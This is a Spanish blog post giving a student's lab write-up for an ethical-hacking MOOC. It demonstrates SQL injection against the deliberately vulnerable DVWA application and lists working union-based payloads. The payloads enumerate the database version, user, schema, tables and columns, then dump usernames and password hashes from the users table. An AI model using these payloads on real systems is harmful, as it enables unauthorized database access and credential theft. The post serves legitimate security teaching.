miércoles, 7 de octubre de 2015

Unidad 2 Tarea 2: SQL injection
MOOC Hacking Ético, Mondragon Unibertsitatea
UNIDAD 2, TAREA 2: SQL injection
Usa la técnica SQL injection para obtener información relevante sobre la estructura de una base de datos.
Iniciamos máquina virtual:

Verificamos dirección IP:

Entramos al browser de internet y accedemos a la IP:

Ingresamos usuario (admin) y contraseña (password) y hacemos click en Login:

Vamos al menú y hacemos clic en la opción DVWA Security y cambiamos el nivel de seguridad a Low y hacemos clic en el botón Submit:

Vamos nuevamente al menú y seleccionamos SQL Injection, en el campo User ID digitamos el valor 1 dentro del campo texto y hacemos click en Submit, esto para que nos despliegue el nombre de usuario:

Ahora volvemos al campo User ID y digitamos el texto  %’ or ‘0’=’0 dentro  del campo User ID y hacemos click en Submit, esto con la finalidad de conocer nombres y apellidos de usuarios:

Ahora volvemos al campo User ID y digitamos el texto %’ or 0=0 union select null, version() # y hacemos click en Submit, esto con la finalidad de conocer la versión de la base de datos mysql:

Ahora volvemos al campo User ID y digitamos el texto %’ or 0=0 union select null, user() # y hacemos click en Submit, esto con la finalidad de conocer el nombre del usuario de la base de datos:

Ahora volvemos al campo User ID y digitamos el texto %’ or 0=0 union select null, database() # y hacemos click en Submit, esto con la finalidad de conocer el nombre de la base de datos:

Ahora volvemos al campo User ID y digitamos el texto %’ and 1=0 union select null, table_name from information_schema.tables # y hacemos click en Submit, esto con la finalidad de conocer los nombres de los schema de tablas de la base de datos:

Ahora volvemos al campo User ID y digitamos el texto %’ and 1=0 union select null, table_name from information_schema.tables where table_name like ‘user%’# y hacemos click en Submit, esto con la finalidad de conocer los nombres de todas las tablas del schema de base datos que comienzan con el prefijo user:

Ahora volvemos al campo User ID y digitamos el texto %’ and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = ‘users’ # y hacemos click en Submit, esto con la finalidad de conocer los nombres de todas las columnas de la tabla users:

Ahora volvemos al campo User ID y digitamos el texto %’ and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users # y hacemos click en Submit, esto con la finalidad de conocer el contenido de las columnas de la tabla users:



Publicado por en

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)